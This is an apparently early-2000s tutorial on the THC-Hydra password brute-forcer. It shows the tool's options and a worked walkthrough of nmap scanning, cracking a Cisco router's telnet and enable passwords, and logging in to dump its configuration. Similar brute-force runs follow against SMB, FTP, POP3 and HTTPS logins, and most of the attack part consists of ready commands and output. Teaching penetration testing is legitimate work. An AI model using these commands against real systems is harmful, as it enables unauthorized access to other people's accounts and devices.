Hydra

In cryptanalysis, a brute force attack is a method of defeating a cryptographic scheme by trying a large number of possibilities; for example, exhaustively working through all possible keys in order to decrypt a message. In most schemes, the theoretical possibility of a brute force attack is recognised, but it is set up in such a way that it would be computationally infeasible to carry out.

Hydra is a parallized login hacker. It supports bruteforce of Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. It includes SSL support and is part of Nessus. If you’ve been considering installing Linux, this would be a good time.

Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.

THC-Hydra is the world's first parallel login hacker. With this tool, you are able to attack several services at once (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS). Also included Socks5 and SSL support.

bash-2.05b# ./hydra

Hydra v2.2 (c) 2002 by van Hauser / THC <vh@reptile.rug.ac.be>

Syntax: ./hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-o FILE] [-t TASKS] [-g TASKS] [-w TIME] [-f] [-e ns] [-s PORT] [-S] server service [OPT]

Options:

  -S        connect via SSL
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE try password PASS, or load several passwords from FILE
  -e ns     additional checks, "n" for null password, "s" try login as pass
  -C FILE   colon seperated "login:pass" format, instead of -L/-P option
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f  exit after the first found login/password pair
  -t TASKS  run TASKS number of connects in parallel (default: 4)
  -g TASKS  start TASKS number per second until -t TASKS are reached
  -w TIME   in seconds, defines the max wait reply time (default: 30)
  server    the target server
  service   the service to crack. Supported protocols: [telnet ftp pop3 imap 
            http https smb cisco cisco-enable ldap nntp vnc rexec socks5 icq
            pcnfs]
  OPT       some service modules need additional input, put it here

Hydra is a tool to guess valid login/password pairs on a target server. You can always find the newest version at http://www.thehackerschoice.com Use this tool only for legal purposes! bash-2.05b#

NOTE:I have created a small password file called pass.txt in my Hydra binary directory. Replace this with your favourite password list.

We'll start with an NMAP fingerprinting of the Router:

Command line: nmap -O 192.168.1.229

bash-2.05b# nmap -O 192.168.1.229

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-10-05 14:48 IST
Interesting ports on 192.168.1.229:
(The 1641 ports scanned but not shown below are in state: closed)
Port       State       Service
23/tcp     open        telnet
79/tcp     open        finger
80/tcp     open        http
Device type: router
Running: Cisco IOS 11.X|21.X
OS details: Cisco IOS 11.3 - 12.0(11), Cisco IOS v11.14(CA)/12.0.2aT1/v12.0.3T

Nmap run completed -- 1 IP address (1 host up) scanned in 5.141 seconds

bash-2.05b#

We've identified the Telnet service running - Let’s use hydra to bruteforce the telnet password.

Command line: ./hydra -P pass.txt 192.168.1.229 cisco

bash-2.05b# ./hydra -P pass.txt 192.168.1.229 cisco

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
Hydra is starting! [parallel tasks: 4, login tries: 13 (l:1/p:13)] 
[23][cisco] login:    password: cloud
Hydra finished.

bash-2.05b#

Once we have a Telnet login (vty) we can try and bruteforce the enable password of the router:

Command line: ./hydra -m cloud -P pass.txt 192.168.1.229 cisco-enable

bash-2.05b# ./hydra -m cloud -P pass.txt 192.168.1.229  cisco-enable

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
Hydra is starting! [parallel tasks: 4, login tries: 13 (l:1/p:13)]
[23][cisco-enable] login:    password: doggy
Hydra finished.

bash-2.05b#

So now, we can telnet to the router, will full access:

Command line: telnet 192.168 .1.229

bash-2.05b# telnet 192.168 .1.229
Trying 192.168.1.229...
Connected to 192.168.1.229.
Escape character is '^]'.

User Access Verification

Password: (cloud)
Switch>en
Password:  (doggy)
Switch#sh ru
Building configuration...
Current configuration:
!
version 12.0
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Switch
!
enable secret 5 $1$y19Y$GPYusTVCWnJs9PUkraoV90
enable password cloud
!
!
ip subnet-zero
!
! --More-- 

Command line: ./hydra -l administrator -P pass.txt 192.168.0.141 smb

bash-2.05b# ./hydra -l administrator -P pass.txt 192.168.0.141 smb

Reduced number of tasks to 1 (smb does not like parallel connections) Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes. Hydra is starting! [parallel tasks: 1, login tries: 13 (l:1/p:13)] [139][smb] login: administrator password: lab All childrens are dead.

bash-2.05b#

Command line: ./hydra -l administrator -P pass.txt 192.168.0.110 ftp

bash-2.05b# ./hydra -l administrator -P pass.txt 192.168.0.110 ftp

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes. Hydra is starting! [parallel tasks: 4, login tries: 14 (l:1/p:14)] [21][ftp] login: administrator password: mypassword Hydra finished.

bash-2.05b#

Command line: ./hydra -l muts -P pass.txt my.pop3.mail pop3

bash-2.05b# ./hydra -l muts -P pass.txt my.pop3.mail pop3

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes. Hydra is starting! [parallel tasks: 4, login tries: 19 (l:1/p:19)] [110][pop3] login: muts password: mypassword Hydra finished.

bash-2.05b#

Command line: ./hydra -m /index.php -l muts -P pass.txt 192.168.0.12 https

bash-2.05b# ./hydra -m /index.php -l muts -P pass.txt 192.168.0.12 https

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes. Hydra is starting! [parallel tasks: 4, login tries: 17 (l:1/p:17)] [443][www] login: muts password: password All childrens are dead.

bash-2.05b#

Target selection:

Login/Password setup:

Hydra start and output: